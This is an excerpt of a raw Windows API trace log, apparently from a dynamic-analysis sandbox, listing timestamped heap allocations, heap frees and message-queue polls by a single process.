Flags=0x0, Size=0x8) returned 0x12efd40 [0140.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1c200) returned 0x15145c8 [0140.401] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14f83c0 | out: hHeap=0x12c0000) returned 1 [0140.401] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0140.401] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.401] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x15145c8 | out: hHeap=0x12c0000) returned 1 [0140.401] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0140.401] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.401] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300090 [0140.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ef0 [0140.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7088 [0140.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e30 [0140.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd30 [0140.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ef0 | out: hHeap=0x12c0000) returned 1 [0140.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300090 | out: hHeap=0x12c0000) returned 1 [0140.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e30 | out: hHeap=0x12c0000) returned 1 [0140.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0140.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7088 | out: hHeap=0x12c0000) returned 1 [0140.402] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.402] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0140.402] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.403] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.403] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0140.403] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0140.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0140.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0140.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.403] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0140.403] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0140.403] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.403] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.403] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0140.403] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0140.404] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0140.404] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0140.404] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0140.404] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.404] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0140.404] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0140.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0140.404] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0140.404] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.404] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0140.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0140.404] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.404] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0140.404] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.405] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0140.405] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0140.405] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0140.405] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0140.405] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.405] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0140.405] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.405] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0140.405] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.405] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0140.405] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.405] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0140.405] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0140.405] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.405] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0140.406] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0140.406] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.406] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0140.406] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.406] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.406] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0140.406] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0140.406] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0140.406] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0140.406] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.406] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0140.406] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.406] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0140.406] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.406] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.406] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0140.406] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0140.406] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0140.406] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0140.406] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.406] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0140.407] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.407] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0140.407] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.407] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.407] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0140.407] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0140.407] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0140.407] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0140.407] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.407] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0140.407] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.407] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0140.407] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.408] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.408] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0140.408] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0140.408] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0140.408] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0140.408] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.408] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0140.408] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.408] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0140.408] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.408] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd40 [0140.408] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0140.408] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0140.408] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0140.408] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0140.408] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0140.408] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0140.408] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.409] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0140.409] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0140.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0140.409] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0140.409] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0140.409] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0140.409] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fffc8 [0140.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ff8 [0140.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efea0 [0140.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e78 [0140.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e00 [0140.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.409] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e00 | out: hHeap=0x12c0000) returned 1 [0140.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0140.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6fb0 [0140.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0140.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6fb0 | out: hHeap=0x12c0000) returned 1 [0140.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1316600 [0140.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e00 [0140.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd00 [0140.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x78) returned 0x131d968 [0140.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b70b8 [0140.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f08 [0140.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7010 [0140.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f98 [0140.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6ef0 [0140.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6fe0 [0140.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f20 [0140.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7028 [0140.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f50 [0140.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f38 [0140.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b70a0 [0140.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6ed8 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ec0 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7088 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f68 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6dd0 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f80 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6fb0 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e18 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e30 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7040 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6de8 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e48 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e60 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e90 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6ea8 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b72e0 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b73b8 [0140.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7220 [0140.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7358 [0140.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7100 [0140.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b73a0 [0140.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7328 [0140.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7298 [0140.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b72b0 [0140.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b71a8 [0140.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7340 [0140.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7310 [0140.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7280 [0140.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b72f8 [0140.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7130 [0140.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7160 [0140.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300270 [0140.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7238 [0140.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0140.413] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7370 [0140.413] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0140.413] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7148 [0140.413] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0140.413] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd40 [0140.413] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0140.413] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7388 [0140.413] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7388 | out: hHeap=0x12c0000) returned 1 [0140.413] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0140.413] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0140.413] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0140.413] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b70d0 [0140.413] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0140.413] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7268 [0140.413] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0140.414] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7208 [0140.414] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0140.414] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7178 [0140.414] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0140.414] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b71c0 [0140.414] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0140.414] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7388 [0140.414] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0140.414] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b72c8 [0140.414] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0140.414] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b70e8 [0140.414] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0140.414] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b71f0 [0140.414] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0140.414] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b71d8 [0140.414] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0140.414] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7118 [0140.414] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0140.415] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300090 [0140.415] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7190 [0140.415] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd40 [0140.415] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x13166c0 [0140.415] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, 